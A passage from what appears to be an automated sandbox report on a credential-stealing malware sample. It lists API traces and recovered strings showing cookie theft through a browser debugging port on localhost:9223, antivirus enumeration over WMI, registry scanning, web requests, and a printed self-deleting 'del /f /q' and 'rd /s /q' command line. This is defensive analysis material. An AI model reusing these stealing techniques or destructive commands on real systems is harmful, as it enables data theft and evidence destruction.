                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385BC), ref: 02A0BE45
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE4F
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385C0), ref: 02A0BE5B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 02A0BE65
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A385C4), ref: 02A0BE71
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(00000000), ref: 02A0BEC3
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A0BEDE
                                                                                                                                                                                                                                                                                                                                                          • DeleteFileA.KERNEL32(?), ref: 02A0BF21
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A15317
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,true), ref: 02A153D9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrlen.KERNEL32(?,?,02A19098,02A377FE,02A37787,?,?,?,?,02A19D6E), ref: 02A121AB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121A5: lstrcpy.KERNEL32(00000000,00000000), ref: 02A121DD
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,?), ref: 02A1549B
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A154CB
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A15506
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A15541
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A1557C
                                                                                                                                                                                                                                                                                                                                                          • lstrcpy.KERNEL32(?,00000000), ref: 02A155B7
                                                                                                                                                                                                                                                                                                                                                          • strtok_s.MSVCRT ref: 02A156CB
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: false$true
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2116072422-2658103896
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 473a633a27ec06942c7a5b461d6f42905d189dd795dbfe0af56ef094f98936de
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ddf549c056087a4a518a6f8b86834151a71022b4204b667b753b88b9a2021b4a
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 473a633a27ec06942c7a5b461d6f42905d189dd795dbfe0af56ef094f98936de
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C9B13775D802289FDB64EF24DC88BD973B9BB58320F0005E6E949A7260DF70AEC58F50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A07E0E: InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 02A07E3C
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A08C21
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,ws://localhost:9223), ref: 02A08C3B
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02A08C5A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1045E: _memmove.LIBCMT ref: 02A10478
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$InternetOpen_memmove_memset
                                                                                                                                                                                                                                                                                                                                                          • String ID: .txt$/devtools$Cookies$localhost$ws://localhost:9223
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 216805803-4155744131
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 3d962433a930897a09198cc19d35cec64c6db7093bd02eb12c259f08da1882ab
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a5e986d4089fddddb4df183fc9bf85f228171ae0d46d0e358254b7b0733565ba
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d962433a930897a09198cc19d35cec64c6db7093bd02eb12c259f08da1882ab
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75612C71D406289FDB20EB64DD85BDEB7B9AF04311F4045E5AA09E3180DEB4ABC9CF50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A068F1
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A0690B
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A0693A
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06979
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A069A9
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A069B4
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A069D8
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 02A06A6C
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A7C
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A88
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A06A94
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                                                                                                                          • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3863758870-2509457195
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 150ecbeccebec24e3675dfa31729b12563ce7139cb261bef75b8e1765c59a772
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7f278ff763b03671b49e538bad5d3e480b3e25951c5ba0eb7cba005f67fb8e0c
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 150ecbeccebec24e3675dfa31729b12563ce7139cb261bef75b8e1765c59a772
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35518D71D40169AFEF21AB60ED84BAEB7F9FB04744F0081A1FA48A6090DF305E949F90
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12175: lstrcpy.KERNEL32(00000000,?), ref: 02A12194
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A10
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A16
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04A1C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04A2E
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A049DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04A36
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 02A051A6
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A051AD
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 02A051CF
                                                                                                                                                                                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 02A051E9
                                                                                                                                                                                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A05219
                                                                                                                                                                                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A05258
                                                                                                                                                                                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A05288
                                                                                                                                                                                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A05293
                                                                                                                                                                                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 02A052BC
                                                                                                                                                                                                                                                                                                                                                          • InternetReadFile.WININET(?,?,00000400,?), ref: 02A05302
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A05361
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A0536D
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 02A05379
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: GET
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 442264750-1805413626
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: da796efefec5935aee05cdd7dc4fe9bfd15bf154580aebee1455cc664eb7b52d
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: b585e0f994aaf7cb95f6e8c2f2cd4ab9ffc44cd97ec0369150a9d435eeed4ecb
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da796efefec5935aee05cdd7dc4fe9bfd15bf154580aebee1455cc664eb7b52d
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C513B75D40928AFDB209F64DC85BABBBB9FB08306F0445E5BA05A2180DB715F908F51
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 02A135FA
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeEx.COMBASE(00000000,00000000), ref: 02A13609
                                                                                                                                                                                                                                                                                                                                                          • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 02A1361A
                                                                                                                                                                                                                                                                                                                                                          • CoCreateInstance.COMBASE(02A33F70,00000000,00000001,02A33EA0,?), ref: 02A13634
                                                                                                                                                                                                                                                                                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02A1366A
                                                                                                                                                                                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 02A136B9
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1399E: LocalAlloc.KERNEL32(00000040,00000005,?,?,02A136DC,?), ref: 02A139A6
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1399E: CharToOemW.USER32(?,00000000), ref: 02A139B2
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 02A136E7
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                                                                                                                                                                                                          • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A01297
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A012A6
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC08), ref: 02A012C0
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC0C), ref: 02A012CE
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC10), ref: 02A012DC
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC14), ref: 02A012EA
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC18), ref: 02A012F8
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC1C), ref: 02A01306
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC20), ref: 02A01314
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC24), ref: 02A01322
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC28), ref: 02A01330
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC2C), ref: 02A0133E
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC30), ref: 02A0134C
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC34), ref: 02A0135A
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(?,02A3BC38), ref: 02A01368
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01375), ref: 02A128ED
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: RtlAllocateHeap.NTDLL(00000000), ref: 02A128F4
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A128E1: GetComputerNameA.KERNEL32(00000000,02A01375), ref: 02A12908
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A013D3
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A37816,00000000,?,?), ref: 02A12ECF
                                                                                                                                                                                                                                                                                                                                                          • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A12F0C
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12F39
                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A12F58
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A12F8E
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A12FA3
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                          • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A37E28), ref: 02A13038
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130A2
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130C2
                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 02A130CE
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                                                                                                                                                                                                          • String ID: - $%s\%s$?
                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2394436309-3278919252
                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d300422a9f58e3ef1455379df4ee79cad398c2f5f5e86ac84d0652776448846f
                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 95eba54d0d649623e5af4a2e23be9a79aaa9edb7083f87b30908bd39f564f328
                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d300422a9f58e3ef1455379df4ee79cad398c2f5f5e86ac84d0652776448846f
                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A761E775D4012C9AEF21DF64ED84FDAB7B9AB44310F1046E6AA09A2111DF70AFD9CF50
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19A71
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19A80
                                                                                                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?), ref: 02A19A95
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 02A19C35
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19C44
                                                                                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 02A19C56
                                                                                                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02A19C66
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrlen.KERNEL32(?,?,?,02A18FD9,abc_,00000000,02A37786,?,?,?,?,02A19D6E), ref: 02A12279
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcpy.KERNEL32(00000000,?), ref: 02A122A1
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12265: lstrcat.KERNEL32(?,00000000), ref: 02A122AC
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A121E9: lstrcpy.KERNEL32(00000000,?), ref: 02A12219
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcpy.KERNEL32(00000000,?), ref: 02A12251
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12223: lstrcat.KERNEL32(?,?), ref: 02A1225B
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          • " & rd /s /q "C:\ProgramData\, xrefs: 02A19B0E
                                                                                                                                                                                                                                                                                                                                                          • " & exit, xrefs: 02A19B64
                                                                                                                                                                                                                                                                                                                                                          • /c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 02A19B6B
                                                                                                                                                                                                                                                                                                                                                          • /c timeout /t 10 & del /f /q ", xrefs: 02A19AC0
                                                                                                                                                                                                                                                                                                                                                          • " & exit, xrefs: 02A19BB5
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
                                                                                                                                                                                                                                                                                                                                                          • String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenA.WININET(WebSocketClient,00000001,00000000,00000000,00000000), ref: 02A07E3C
                                                                                                                                                                                                                                                                                                                                                          • InternetOpenUrlA.WININET(00000000,http://localhost:9223/json,00000000,00000000,80000000,00000000), ref: 02A07E6F
                                                                                                                                                                                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 02A07E7C
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_2a00000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                          • API ID: Internet$Open$CloseHandle
                                                                                                                                                                                                                                                                                                                                                          • String ID: "webSocketDebuggerUrl":$"ws://$WebSocketClient$http://localhost:9223/json
                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A12631
                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A12671
                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A126C6
                                                                                                                                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000), ref: 02A126CD
                                                                                                                                                                                                                                                                                                                                                          • wsprintfA.USER32 ref: 02A12703
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,02A37DD8), ref: 02A12712
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A132FB
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: _memset.LIBCMT ref: 02A1332A
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,00000000), ref: 02A13352
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A132E0: lstrcat.KERNEL32(?,02A37E68), ref: 02A1336F
                                                                                                                                                                                                                                                                                                                                                          • lstrlen.KERNEL32(?), ref: 02A12729
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: malloc.MSVCRT ref: 02A14220
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A1421B: strncpy.MSVCRT ref: 02A14231
                                                                                                                                                                                                                                                                                                                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 02A1274C
                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 02A12143: lstrcpy.KERNEL32(00000000,00000000), ref: 02A12169
                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                          • Source File: 00000003.00000002.3357688139.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
